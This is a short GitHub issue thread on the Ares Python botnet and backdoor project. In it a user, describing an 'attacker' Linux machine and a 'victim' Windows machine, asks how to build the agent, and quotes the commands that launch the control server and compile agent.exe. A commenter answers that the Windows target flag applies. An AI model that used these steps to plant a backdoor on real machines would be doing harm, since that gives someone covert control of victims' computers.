sweetsoftware / Ares

Python botnet and backdoor
1.52k stars 475 forks source link

Ares agent compilation problem #74

Open ghost opened 4 years ago

ghost commented 4 years ago

I'm confused about ares gent compilation.

My attacker machine is a linux and my victim machine is a windows

I launched the server with the command
./ares.py runserver -h 0.0.0.0 -p 8082 --threaded (in my case) I'm blocked about the agent please: 1) Where I have to applied this command (on linux or windows machine ?) ./builder.py -p Linux --server http://localhost:8082 -o agent.exe

2) Have I do ./builder.py -p Linux --server http://localhost:8082 -o agent.exe or ./builder.py -p Windows--server http://localhost:8082 -o agent.exe

Thanks for your help

g3tsh3ll commented 4 years ago

-p Windows